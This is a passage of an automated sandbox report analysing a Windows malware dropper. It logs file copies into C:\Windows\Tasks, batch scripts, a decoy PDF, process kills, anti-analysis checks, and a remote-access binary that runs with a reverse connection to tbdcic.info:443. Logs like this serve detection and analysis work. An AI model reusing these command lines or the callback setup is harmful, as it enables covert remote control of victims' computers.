eStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivat28_2_00007FF790C3E1D0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C89A40 GetPrivateProfileIntA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetPrivateProfileIntA,28_2_00007FF790C89A40
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C87BD0 GetPrivateProfileIntA,28_2_00007FF790C87BD0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C87C90 GetPrivateProfileIntA,28_2_00007FF790C87C90
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C87E10 GetPrivateProfileIntA,28_2_00007FF790C87E10
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C87D50 GetPrivateProfileIntA,28_2_00007FF790C87D50
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C87EB0 GetPrivateProfileIntA,28_2_00007FF790C87EB0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C87650 GetPrivateProfileIntA,RegCreateKeyExA,RegCreateKeyExA,28_2_00007FF790C87650
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C877F0 GetPrivateProfileIntA,RegQueryValueExA,GetPrivateProfileIntA,28_2_00007FF790C877F0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C87750 GetPrivateProfileIntA,RegCloseKey,RegCloseKey,RegCloseKey,28_2_00007FF790C87750
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C87F50 GetPrivateProfileIntA,28_2_00007FF790C87F50
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C878E0 GetPrivateProfileIntA,RegQueryValueExA,RegQueryValueExA,GetPrivateProfileStringA,28_2_00007FF790C878E0
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\3889122.Khe9oLYJump to behavior

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (98).png
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C648B0 IsIconic,IsWindowVisible,GetWindowRect,SHAppBarMessage,24_2_00007FF790C648B0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C648B0 IsIconic,IsWindowVisible,GetWindowRect,SHAppBarMessage,28_2_00007FF790C648B0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C35A60 LoadLibraryA,GetModuleFileNameA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,DeleteFileA,24_2_00007FF790C35A60
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Tasks\browser_sn.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Tasks\browser_sn.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Tasks\browser_sn.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Tasks\browser_sn.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C99BC0 LoadLibraryA,GetProcAddress,GetProcAddress,GetSystemMetrics,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,FreeLibrary,ProcessIdToSessionId,ProcessIdToSessionId,CloseHandle,FreeLibrary,Process32Next,24_2_00007FF790C99BC0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: OpenSCManagerA,EnumServicesStatusA,GetLastError,EnumServicesStatusA,OpenServiceA,QueryServiceConfigA,GetLastError,QueryServiceConfigA,CloseServiceHandle,CloseServiceHandle,24_2_00007FF790C39D00
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: OpenSCManagerA,EnumServicesStatusA,GetLastError,EnumServicesStatusA,OpenServiceA,QueryServiceConfigA,GetLastError,QueryServiceConfigA,CloseServiceHandle,CloseServiceHandle,28_2_00007FF790C39D00
                            Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 507Jump to behavior
                            Source: C:\Windows\Tasks\browser_sn.exeWindow / User API: threadDelayed 682
                            Source: C:\Windows\SysWOW64\timeout.exeWindow / User API: threadDelayed 1495
                            Source: C:\Windows\Tasks\browser_sn.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_24-22876
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\uqVb3.kkb9hJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Windows\Tasks\uqVb3.kkb9hJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Windows\Tasks\conhost.exeJump to dropped file
                            Source: C:\Windows\Tasks\browser_sn.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_24-22604
                            Source: C:\Windows\Tasks\browser_sn.exeAPI coverage: 3.5 %
                            Source: C:\Windows\Tasks\browser_sn.exeAPI coverage: 1.2 %
                            Source: C:\Windows\SysWOW64\timeout.exe TID: 8348Thread sleep count: 64 > 30
                            Source: C:\Windows\SysWOW64\timeout.exe TID: 8788Thread sleep count: 34 > 30
                            Source: C:\Windows\Tasks\browser_sn.exe TID: 9060Thread sleep time: -68200s >= -30000s
                            Source: C:\Windows\SysWOW64\timeout.exe TID: 8964Thread sleep count: 64 > 30
                            Source: C:\Windows\SysWOW64\timeout.exe TID: 9036Thread sleep count: 32 > 30
                            Source: C:\Windows\SysWOW64\timeout.exe TID: 9068Thread sleep count: 1495 > 30
                            Source: C:\Windows\SysWOW64\timeout.exe TID: 9068Thread sleep time: -149500s >= -30000s
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\Tasks\browser_sn.exeLast function: Thread delayed
                            Source: C:\Windows\Tasks\browser_sn.exeLast function: Thread delayed
                            Source: C:\Windows\SysWOW64\timeout.exeLast function: Thread delayed
                            Source: C:\Windows\SysWOW64\timeout.exeLast function: Thread delayed
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: 0_2_00403387 GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,0_2_00403387
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: 0_2_00402EE6 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00402EE6
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C5C210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,24_2_00007FF790C5C210
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790CEA228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,24_2_00007FF790CEA228
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C56DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,24_2_00007FF790C56DD1
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C35910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,24_2_00007FF790C35910
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C5C210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,28_2_00007FF790C5C210
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790CEA228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,28_2_00007FF790CEA228
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C56DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,28_2_00007FF790C56DD1
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C35910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,28_2_00007FF790C35910
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C56DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,24_2_00007FF790C56DD1
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C49260 GetVersionExA,GetVersionExA,GetModuleHandleA,GetProcAddress,GetSystemInfo,24_2_00007FF790C49260
                            Source: browser_sn.exe, 00000018.00000002.1545831120.0000000002796000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 0000001C.00000002.1479984640.0000000002BC5000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000025.00000002.1647077751.0000000002596000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000025.00000002.1646990138.00000000023D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
                            Source: browser_sn.exe, 00000023.00000002.2540248837.0000000002866000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -pSsT AUTHOTY\LocLocalSystemHyper-V Data Exchange Service
                            Source: browser_sn.exe, 00000025.00000002.1646704847.000000000090B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWors
                            Source: browser_sn.exe, 0000001C.00000002.1479984640.0000000002BC5000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000025.00000002.1646990138.00000000023D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
                            Source: browser_sn.exe, 0000001C.00000002.1479984640.0000000002BC5000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000025.00000002.1646990138.00000000023D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
                            Source: browser_sn.exe, 0000001C.00000002.1480044790.0000000002DA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -pLocalSystemHyper-V Data Exchange Service
                            Source: browser_sn.exe, 0000001C.00000002.1480044790.0000000002DA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -pLocalSystemHyper-V Guest Service Interface{3
                            Source: browser_sn.exe, 0000001C.00000002.1479984640.0000000002BC5000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000025.00000002.1646990138.00000000023D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
                            Source: browser_sn.exe, 00000018.00000002.1545831120.0000000002796000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000025.00000002.1647077751.0000000002596000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -pLocalSystemHyper-V PowerShell Direct Service
                            Source: browser_sn.exe, 00000025.00000002.1647077751.0000000002596000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\system32\svchost.exe -k ICService -pworkResicted LocalSystemHyper-V Remote Desktop Virtualization ServiceInterface
                            Source: browser_sn.exe, 00000018.00000002.1545831120.0000000002796000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -pLocalSystemHyper-V Guest Service Interface
                            Source: browser_sn.exe, 00000018.00000002.1545470757.0000000000B2B000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 0000001C.00000002.1479835902.000000000106A000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000023.00000002.2539905996.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: browser_sn.exe, 0000001C.00000002.1479984640.0000000002BC5000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000025.00000002.1646990138.00000000023D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
                            Source: browser_sn.exe, 00000025.00000002.1647077751.0000000002596000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -pnWorktationLocalSystemHyper-V Data Exchange Service
                            Source: browser_sn.exe, 00000025.00000002.1646990138.00000000023D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicshutdown
                            Source: browser_sn.exe, 00000018.00000002.1545831120.0000000002796000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 0000001C.00000002.1479984640.0000000002BC5000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000025.00000002.1647077751.0000000002596000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000025.00000002.1646990138.00000000023D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
                            Source: browser_sn.exe, 0000001C.00000002.1480044790.0000000002DA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\system32\svchost.exe -k ICService -pLocalSystemuthoHyper-V Remote Desktop Virtualization Services
                            Source: browser_sn.exe, 00000025.00000002.1646990138.00000000023D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicvss
                            Source: browser_sn.exe, 00000018.00000002.1545831120.0000000002796000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\system32\svchost.exe -k ICService -pLocalSystemHyper-V Remote Desktop Virtualization Service5
                            Source: browser_sn.exe, 0000001C.00000002.1480044790.0000000002DA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uthoHyper-V Remote Desktop Virtualization Service
                            Source: browser_sn.exe, 00000025.00000002.1646704847.000000000090B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
                            Source: browser_sn.exe, 0000001C.00000002.1479984640.0000000002BC5000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 0000001C.00000002.1480044790.0000000002DA6000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000023.00000002.2540248837.0000000002866000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000025.00000002.1647077751.0000000002596000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000025.00000002.1646990138.00000000023D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
                            Source: browser_sn.exe, 0000001C.00000002.1480044790.0000000002DA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \LocHyper-V PowerShell Direct Service
                            Source: browser_sn.exe, 0000001C.00000002.1480044790.0000000002DA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -pLocalSystem\LocHyper-V PowerShell Direct Service
                            Source: browser_sn.exe, 00000023.00000002.2540248837.0000000002866000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -pLocalSystemHyper-V Guest Service InterfaceX
                            Source: browser_sn.exe, 00000018.00000002.1545831120.0000000002796000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 0000001C.00000002.1479984640.0000000002BC5000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 0000001C.00000002.1480044790.0000000002DA6000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000023.00000002.2540248837.0000000002866000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000025.00000002.1646990138.00000000023D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
                            Source: browser_sn.exe, 00000025.00000002.1646990138.00000000023D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
                            Source: C:\Windows\Tasks\browser_sn.exeAPI call chain: ExitProcess graph end nodegraph_24-22369
                            Source: C:\Windows\Tasks\browser_sn.exeAPI call chain: ExitProcess graph end node
                            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790CE7220 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_00007FF790CE7220
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C426B0 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,WTSGetActiveConsoleSessionId,Sleep,GetLastError,sprintf,OutputDebugStringA,Sleep,FreeLibrary,FreeLibrary,24_2_00007FF790C426B0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C99BC0 LoadLibraryA,GetProcAddress,GetProcAddress,GetSystemMetrics,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,FreeLibrary,ProcessIdToSessionId,ProcessIdToSessionId,CloseHandle,FreeLibrary,Process32Next,24_2_00007FF790C99BC0
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: 0_2_0040236F LoadLibraryA,GetProcAddress,GetNativeSystemInfo,0_2_0040236F
                            Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790CE7220 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_00007FF790CE7220
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790CF47E4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_00007FF790CF47E4
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790CE7220 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00007FF790CE7220
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790CF47E4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00007FF790CF47E4
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: LoadLibraryA,GetProcAddress,GetProcAddress,GetSystemMetrics,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32First,CloseHandle,FreeLibrary,CloseHandle,FreeLibrary,Process32Next, explorer.exe28_2_00007FF790C99BC0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C43210 GetVersionExA,GetEnvironmentVariableA,GetPrivateProfileStringA,GetPrivateProfileStringA,SetFileAttributesA,WritePrivateProfileStringA,GetLastError,GetEnvironmentVariableA,GetForegroundWindow,ShellExecuteExA,24_2_00007FF790C43210
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C474C0 keybd_event,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,TryEnterCriticalSection,LeaveCriticalSection,keybd_event,24_2_00007FF790C474C0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C34390 Sleep,CreateThread,CloseHandle,SendMessageA,FindWindowA,PostMessageA,SendMessageA,mouse_event,Sleep,mouse_event,FindWindowA,PostMessageA,24_2_00007FF790C34390
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\"Jump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 9655269573 9655269573.cmdJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 3889122.Khe9oLY 3889122.cmdJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 9655269573.cmdJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im browser_sn.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 8Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 4Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Windows\Tasks\3889122.cmd"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 600Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im browser_sn.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 8
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 4
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im browser_sn.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im browser_sn.exe
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C47B90 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,ConvertStringSecurityDescriptorToSecurityDescriptorA,GetLastError,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,CreateFileMappingA,MapViewOfFile,CreateEventA,CreateEventA,CreateFileMappingA,MapViewOfFile,CreateEventA,CreateEventA,24_2_00007FF790C47B90
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: 0_2_0040244E AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0040244E
                            Source: Xv6Ya.d8LhT.0.drBinary or memory string: Program ManagerProgmanSHELLDLL_DefViewFolderViewSysListView32BlockInputtimerscreenupdatemouseupdateuser1user2quitrestartvncdesktop.cpp : ~vncDesktop
